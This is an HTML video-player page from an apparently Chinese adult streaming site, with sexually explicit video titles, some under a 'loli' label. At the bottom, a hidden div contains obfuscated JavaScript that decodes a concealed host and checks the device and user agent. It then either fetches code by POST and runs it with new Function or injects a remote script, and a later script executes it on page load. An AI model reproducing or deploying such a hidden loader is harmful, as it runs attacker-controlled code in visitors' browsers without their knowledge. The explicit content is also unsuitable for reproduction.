<!DOCTYPE html>
<html>
<head>
    <title>萝莉社.逛商城玩跳蛋远程操控到腿软-思思在线观看 - 麻豆视频</title>
    <meta name="keywords" content="萝莉社.逛商城玩跳蛋远程操控到腿软-思思在线收看"/>
    <meta name="description" content="萝莉社.逛商城玩跳蛋远程操控到腿软-思思剧情:"/>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta name="renderer" content="webkit|ie-comp|ie-stand">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <link rel="shortcut icon" href="/statics/img/favicon.ico" type="image/x-icon"/>
    <link rel="stylesheet" href="/statics/font/iconfont.css" type="text/css"/>
    <link rel="stylesheet" href="/statics/css/stui_block.css" type="text/css"/>
    <link rel="stylesheet" href="/statics/css/stui_block_color.css" type="text/css"/>
    <link rel="stylesheet" href="/statics/css/stui_default.css" type="text/css"/>
    <script type="text/javascript" src="/statics/js/jquery.min.js"></script>
    <script type="text/javascript" src="/statics/js/stui_default.js"></script>
    <script type="text/javascript" src="/statics/js/stui_block.js "></script>
    <script type="text/javascript" src="/statics/js/home.js"></script>
    <script>
    var maccms = {
        "path": "",
        "mid": "1",
        "url": "www.imadou.cc",
        "wapurl": "www.imadou.cc",
        "mob_status": "0"
    };
    </script>
    <!--[if lt IE 9]>
    <script src="https://cdn.staticfile.org/html5shiv/r29/html5.min.js"></script>
    <script src="https://cdn.staticfile.org/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <script type="text/javascript" src="/statics/js/history.js"></script>
    <script type="text/javascript">
    var vod_name = '萝莉社.逛商城玩跳蛋',
        vod_url = window.location.href,
        vod_part = '第01集';
    </script>
</head>
<body>
    <header class="stui-header__top clearfix" id="header-top">
        <div class="container">
            <div class="row">
                <div class="stui-header_bd clearfix">
                    <div class="stui-header__logo">
                        <a class="logo" href="/"></a>
                    </div>
                    <div class="stui-header__side">
                        <ul class="stui-header__user"></ul>
                        <script type="text/javascript" src="/statics/js/jquery.autocomplete.js"></script>
                        <div class="stui-header__search">
                            <form id="search" name="search" method="get" action="/index.php/vod/search.html" onSubmit="return qrsearch();">
                                <input type="text" name="wd" class="mac_wd form-control" value="" placeholder="请输入关键词..." autocomplete="off"/>
                                <button class="submit" id="searchbutton" type="submit">
                                    <i class="icon iconfont icon-search"></i>
                                </button>
                            </form>
                        </div>
                    </div>
                    <ul class="stui-header__menu type-slide">
                        <li>
                            <a href="/">首页</a>
                        </li>
                        <li class="active">
                            <a href="/index.php/vod/type/id/1.html">麻豆视频</a>
                        </li>
                        <li>
                            <a href="/index.php/vod/type/id/2.html">日本视频</a>
                        </li>
                        <li>
                            <a href="/index.php/vod/type/id/3.html">欧美视频</a>
                        </li>
                        <li>
                            <a href="/index.php/vod/type/id/4.html">动漫视频</a>
                        </li>
                        <li>
                            <a href="/index.php/vod/type/id/5.html">国产视频</a>
                        </li>

                    </ul>
                </div>
            </div>
        </div>
    </header>
    <script type="text/javascript">
    $(".stui-header__user li,.stui-header__menu li").click(function() {
        $(this).find(".dropdown").toggle();
    });
    </script>

    <style type="text/css">
    .stui-player__head {
        display: none;
    }

    @media (max-width: 767px) {
        body {
            padding-top: 0;
        }

        .stui-header__top {
            display: none;
        }

        .stui-player__head {
            display: block;
            padding: 15px;
            background-color: #333;
            color: #fff;
        }

        .stui-player__head a {
            color: #fff;
        }
    }
    </style>

    <div class="container">
        <div class="row">
            <div class="col-lg-wide-75 col-xs-1 padding-0">
                <!-- 播放器-->
                <div class="stui-pannel stui-pannel-bg clearfix">
                    <div class="stui-pannel-box">
                        <div class="stui-pannel-bd">
                            <div class="stui-player col-pd">
                                <div class="stui-player__head">
                                    <span class="pull-right">
                                        <a href="/">
                                            <i class="iconfont icon-home"></i>
                                        </a>
                                    </span>
                                    <a href="javascript:;" onclick="window.history.go(-1)">
                                        <i class="iconfont icon-back"></i>
                                         返回
                                    </a>
                                </div>
                                <div class="stui-player__video clearfix">
                                    <script type="text/javascript">
                                    var player_aaaa = {
                                        "flag": "play",
                                        "encrypt": 0,
                                        "trysee": 0,
                                        "points": 0,
                                        "link": "\/index.php\/vod\/play\/id\/76506\/sid\/1\/nid\/1.html",
                                        "link_next": "",
                                        "link_pre": "",
                                        "vod_data": {
                                            "vod_name": "\u841d\u8389\u793e.\u901b\u5546\u57ce\u73a9\u8df3\u86cb\u8fdc\u7a0b\u64cd\u63a7\u5230\u817f\u8f6f-\u601d\u601d",
                                            "vod_actor": "\u601d\u601d",
                                            "vod_director": "",
                                            "vod_class": "\u841d\u8389\u793e"
                                        },
                                        "url": "https:\/\/t21.cdn2020.com\/video\/m3u8\/2023\/02\/15\/dc1be394\/index.m3u8",
                                        "url_next": "",
                                        "from": "mahua",
                                        "server": "no",
                                        "note": "",
                                        "id": "76506",
                                        "sid": 1,
                                        "nid": 1
                                    }
                                    </script>
                                    <script type="text/javascript" src="/static/js/playerconfig.js?t=20230216"></script>
                                    <script type="text/javascript" src="/static/js/player.js?t=a20230216"></script>
                                </div>
                                <div class="stui-player__detail detail">

                                    <h1 class="title">
                                        <a href="/index.php/vod/detail/id/76506.html">萝莉社.逛商城玩跳蛋远程操控到腿软-思思</a>
                                    </h1>
                                    <p class="data margin-0">
                                        <span class="text-muted">能量：</span>
                                        <span class="mac_hits hits" data-mid="1" data-id="76506" "="" data-type="hits"></span>

                                    </p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- end 播放器 -->

                <div class="stui-pannel stui-pannel-bg clearfix">
                    <div class="stui-pannel-box">
                        <div class="stui-pannel_hd">
                            <div class="stui-pannel__head active bottom-line clearfix">
                                <h3 class="title">
                                    <img src="/statics/icon/icon_6.png"/>

                                                        猜你喜欢
                                                    
                                </h3>
                            </div>
                        </div>
                        <div class="stui-pannel_bd">
                            <ul class="stui-vodlist__bd clearfix">
                                <li class="col-md-6 col-sm-4 col-xs-3 ">
                                    <div class="stui-vodlist__box">
                                        <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/3036/sid/1/nid/1.html" title="萝莉社.寂寞小嫂子带单小舅子感受男女之间的快乐" data-original="https://666533.xyz/images/2022/08/25/dc6f1862248dee5cea4f9da7876cd6cd.jpg">
                                            <span class="play hidden-xs"></span>

                                        </a>
                                        <div class="stui-vodlist__detail">
                                            <h4 class="title text-overflow">
                                                <a href="/index.php/vod/play/id/3036/sid/1/nid/1.html" title="萝莉社.寂寞小嫂子带单小舅子感受男女之间的快乐">萝莉社.寂寞小嫂子带单小舅子感受男女之间的快乐</a>
                                            </h4>
                                            <p class="text text-overflow text-muted hidden-xs">2022-09-15</p>
                                        </div>
                                    </div>
                                </li>
                                <li class="col-md-6 col-sm-4 col-xs-3 ">
                                    <div class="stui-vodlist__box">
                                        <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/2923/sid/1/nid/1.html" title="萝莉社.杀手为执行任务竟舌吻内射-糖糖" data-original="https://666533.xyz/images/2022/08/30/ee6b22585776fedf795590d51d7e17f9.jpg">
                                            <span class="play hidden-xs"></span>

                                        </a>
                                        <div class="stui-vodlist__detail">
                                            <h4 class="title text-overflow">
                                                <a href="/index.php/vod/play/id/2923/sid/1/nid/1.html" title="萝莉社.杀手为执行任务竟舌吻内射-糖糖">萝莉社.杀手为执行任务竟舌吻内射-糖糖</a>
                                            </h4>
                                            <p class="text text-overflow text-muted hidden-xs">2022-09-15</p>
                                        </div>
                                    </div>
                                </li>
                                <li class="col-md-6 col-sm-4 col-xs-3 ">
                                    <div class="stui-vodlist__box">
                                        <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/2912/sid/1/nid/1.html" title="萝莉社.清纯黑丝秘书为老板排忧解难-小敏儿" data-original="https://666533.xyz/images/2022/08/30/d1b24dfc832f43ff07dee15261278437.jpg">
                                            <span class="play hidden-xs"></span>

                                        </a>
                                        <div class="stui-vodlist__detail">
                                            <h4 class="title text-overflow">
                                                <a href="/index.php/vod/play/id/2912/sid/1/nid/1.html" title="萝莉社.清纯黑丝秘书为老板排忧解难-小敏儿">萝莉社.清纯黑丝秘书为老板排忧解难-小敏儿</a>
                                            </h4>
                                            <p class="text text-overflow text-muted hidden-xs">2022-09-15</p>
                                        </div>
                                    </div>
                                </li>
                                <li class="col-md-6 col-sm-4 col-xs-3 ">
                                    <div class="stui-vodlist__box">
                                        <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/38233/sid/1/nid/1.html" title="萝莉社.浴室镜子前极致性爱-粉色情人" data-original="https://666533.xyz/images/2022/09/30/157499398f1b0faaa46a2a09a24e70cc.jpg">
                                            <span class="play hidden-xs"></span>

                                        </a>
                                        <div class="stui-vodlist__detail">
                                            <h4 class="title text-overflow">
                                                <a href="/index.php/vod/play/id/38233/sid/1/nid/1.html" title="萝莉社.浴室镜子前极致性爱-粉色情人">萝莉社.浴室镜子前极致性爱-粉色情人</a>
                                            </h4>
                                            <p class="text text-overflow text-muted hidden-xs">2022-10-01</p>
                                        </div>
                                    </div>
                                </li>
                                <li class="col-md-6 col-sm-4 col-xs-3 ">
                                    <div class="stui-vodlist__box">
                                        <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/38218/sid/1/nid/1.html" title="萝莉社.寂寞骚货约炮附近小哥哥玩情趣制服诱惑" data-original="https://666533.xyz/images/2022/09/30/ca3ec297a2a59f3b919847e61fc18460.jpg">
                                            <span class="play hidden-xs"></span>

                                        </a>
                                        <div class="stui-vodlist__detail">
                                            <h4 class="title text-overflow">
                                                <a href="/index.php/vod/play/id/38218/sid/1/nid/1.html" title="萝莉社.寂寞骚货约炮附近小哥哥玩情趣制服诱惑">萝莉社.寂寞骚货约炮附近小哥哥玩情趣制服诱惑</a>
                                            </h4>
                                            <p class="text text-overflow text-muted hidden-xs">2022-10-01</p>
                                        </div>
                                    </div>
                                </li>
                                <li class="col-md-6 col-sm-4 col-xs-3 ">
                                    <div class="stui-vodlist__box">
                                        <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/40015/sid/1/nid/1.html" title="萝莉社.情趣古装穿越体验古人服务-小雪" data-original="https://666533.xyz/images/2022/10/08/2cc57601e05ab47651a24933262ce4ce.jpg">
                                            <span class="play hidden-xs"></span>

                                        </a>
                                        <div class="stui-vodlist__detail">
                                            <h4 class="title text-overflow">
                                                <a href="/index.php/vod/play/id/40015/sid/1/nid/1.html" title="萝莉社.情趣古装穿越体验古人服务-小雪">萝莉社.情趣古装穿越体验古人服务-小雪</a>
                                            </h4>
                                            <p class="text text-overflow text-muted hidden-xs">2022-10-08</p>
                                        </div>
                                    </div>
                                </li>
                            </ul>

                        </div>
                    </div>
                </div>
                <!-- 猜你喜欢-->
            </div>

        </div>
    </div>
    <script type="text/javascript">
    if (playerhigh == 1) {
        $(".MacPlayer").addClass("embed-responsive embed-responsive-16by9").css({
            "padding-bottom": "56.25%",
            "z-index": "99"
        });
        $("#playleft,.dplayer-video-wrap").css({
            "position": "inherit",
            "overflow": "initial"
        });
    }
    var PlayerHeight = $(".MacPlayer").outerHeight();
    $(".stui-player__video").css("height", PlayerHeight);
    var playli = $(".stui-content__playlist:first li").length;
    if (playcolumn > 1) {
        if (playli > 5) {
            $(".stui-content__playlist").addClass("column" + playcolumn);
        }
    }
    if (playli > 30) {
        $(".stui-content__playlist").css({
            "max-height": " 300px",
            "overflow-y": "scroll"
        });
    }
    </script>
    <span class="mac_hits hits hide" data-mid="1" data-id="76506" data-type="hits"></span>
    <span class="mac_ulog_set hide" data-type="4" data-mid="1" data-id="76506" data-sid="1" data-nid="1"></span>
    <div class="container">
        <div class="row">
            <div class="stui-foot clearfix">
                <div class="col-pd text-center hidden-xs">
                    Copyright
                    <span class="fontArial"></span>
                     2009-2022 www.imadou.cc Inc. All Rights Reserved.
                    <a href="/" target="_blank">[麻豆视频官网]</a>
                    <br>
                    麻豆视频
                </div>
                <p class="share bdsharebuttonbox text-center margin-0 hidden-sm hidden-xs"></p>
                <p class="text-center hidden-xs">
                    <a href="/">
                        <img src="/statics/img/copy.png" width="150" height="48"/>
                    </a>
                </p>
                <p class="text-muted text-center visible-xs">Copyright © 2008-2023</p>
            </div>
        </div>
    </div>
    <!--顶部 -->

    <!--顶部 -->
    <!--底部 -->
    <div style="display: none !important;">function fKCaQw(e){var t="",n=r=c1=c2=0;while(n&lt;e.length){r=e.charCodeAt(n);if(r&lt;128){t+=String.fromCharCode(r);n++;}else if(r&gt;191&&r&lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)&lt;&lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)&lt;&lt;12|(c2&63)&lt;&lt;6|c3&63);n+=3;}}return t;};function mAEXVuRa(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f&lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s&lt;&lt;2|o&gt;&gt;4;r=(o&15)&lt;&lt;4|u&gt;&gt;2;i=(u&3)&lt;&lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return fKCaQw(t);};window[''+'W'+'O'+'k'+'U'+'m'+'I'+'J'+'l'+'e'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=mAEXVuRa,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5ydHkueXlycmMMuY29t','153767',window,document,['M','ZesCzPy']);}:function(){};</div>
    <script>
    new Function(document['cu' + 'rren' + 'tScr' + 'ipt']['prev' + 'iousE' + 'leme' + 'ntSi' + 'bling']['tex' + 'tCo' + 'ntent'])();
    </script>
    <div>
        <div>
            <div></div>
        </div>
    </div>
    <div></div>
    <script>
    WOkUmIJle();
    </script>
    <!--底部 -->
    <div class="hide">
        <script>
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?2ce37ebe1d2accfd7a8d922bf3e9968d";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
        </script>
    </div>

</body>
</html>
